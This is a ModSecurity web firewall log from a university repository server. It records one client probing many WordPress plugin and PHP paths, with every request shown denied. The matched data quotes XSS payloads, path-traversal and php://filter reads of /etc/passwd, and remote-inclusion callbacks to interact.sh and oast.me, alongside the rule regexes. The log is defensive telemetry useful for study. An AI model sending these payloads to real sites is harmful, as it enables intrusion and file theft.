[Tue Aug 29 11:53:04.961726 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAoqbOoAAAAj"]
[Tue Aug 29 11:53:06.660394 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoAkwQAAAAC"]
[Tue Aug 29 11:53:08.361529 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAnTlZoAAAAA"]
[Tue Aug 29 11:53:08.363522 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAodkp8AAAAS"]
[Tue Aug 29 11:53:08.777636 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoocwMAAAAh"]
[Tue Aug 29 11:53:08.801979 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAodkqIAAAAS"]
[Tue Aug 29 11:53:09.668668 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tcCo-f0AAAoZ6SwAAAAK"]
[Tue Aug 29 11:53:10.820025 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAni-B4AAAAU"]
[Tue Aug 29 11:53:11.789386 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAnd3QcAAAAI"]
[Tue Aug 29 11:53:12.024673 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAor7pkAAAAk"]
[Tue Aug 29 11:53:12.623668 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAosCvoAAAAm"]
[Tue Aug 29 11:53:12.859044 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAni-CMAAAAU"]
[Tue Aug 29 11:53:14.484493 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAofm5gAAAAX"]
[Tue Aug 29 11:53:14.703156 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAot8NQAAAAn"]
[Tue Aug 29 11:53:15.786541 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAoqbQQAAAAj"]
[Tue Aug 29 11:53:16.554237 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAouCzgAAAAo"]
[Tue Aug 29 11:53:17.787468 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAowNnMAAAAH"]
[Tue Aug 29 11:53:19.184892 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15v8Co-f0AAAoqbQ8AAAAj"]
[Tue Aug 29 11:53:19.572604 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAowNnkAAAAH"]
[Tue Aug 29 11:53:19.853074 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoqbRAAAAAj"]
[Tue Aug 29 11:53:19.950985 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAn404gAAAAW"]
[Tue Aug 29 11:53:20.690191 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAoz70gAAAAS"]
[Tue Aug 29 11:53:21.634470 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAnTlcYAAAAA"]
[Tue Aug 29 11:53:22.528377 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wsCo-f0AAAoW7PYAAAAJ"]
[Tue Aug 29 11:53:23.284005 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15w8Co-f0AAAoesN0AAAAV"]
[Tue Aug 29 11:53:23.296926 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAowNoYAAAAH"]
[Tue Aug 29 11:53:24.083552 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAor7rsAAAAk"]
[Tue Aug 29 11:53:24.644967 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoT7XUAAAAD"]
[Tue Aug 29 11:53:24.793231 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAni-D8AAAAU"]
